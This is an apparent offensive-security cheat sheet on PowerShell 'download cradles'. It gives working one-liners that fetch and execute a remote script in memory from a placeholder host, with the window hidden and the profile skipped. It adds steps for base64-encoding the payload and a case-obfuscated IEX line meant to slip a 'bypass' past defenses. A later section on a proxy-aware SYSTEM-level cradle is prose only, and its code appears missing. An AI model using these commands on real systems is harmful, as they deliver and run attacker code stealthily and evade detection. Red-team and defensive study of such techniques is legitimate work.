PS Execution - Donwload Craddles
To execute a powershell script in memory and hidden:
powershell -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://example.com/a'))""
To encode commands:
In Linux:
echo -n "{command to execute}" | iconv -t utf-16le | base64 -w 0; echo
In Windows:
$str = 'IEX ((new-object net.webclient).downloadstring("http://example.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
To execute encoded commands:
powershell -nop -w hidden -enc {encoded command}
To inject a bypass directly without downloading it from a server and then loading in memory:
[sYSTEm.tExT.EnCoDInG]::uNIcode.gETsTRing([SySteM.CoNVeRT]::FromBAse64strINg("{base64 here}"))|iex
- Proxy-Aware Download Cradle (System)
To remove the proxy settings by “nulling” them:
To customize the User-Agent:
Example of a Proxy-Aware download cradle script running in SYSTEM integrity:
First, create a PSDrive for the HKEY_USERS Registry Hive.
Then, enumerate Registry Keys under HKEY_USERS.
After that, find a Registry Key that matches a pattern ("S-1-5-21-") that is typically associated with user profiles on a Windows system.
Then, access the Proxy Server Settings from the Registry and use those settingf to configure System Proxy Settings.
Finally download a PowerShell script from a remote server using the configured proxy settings.
Last updated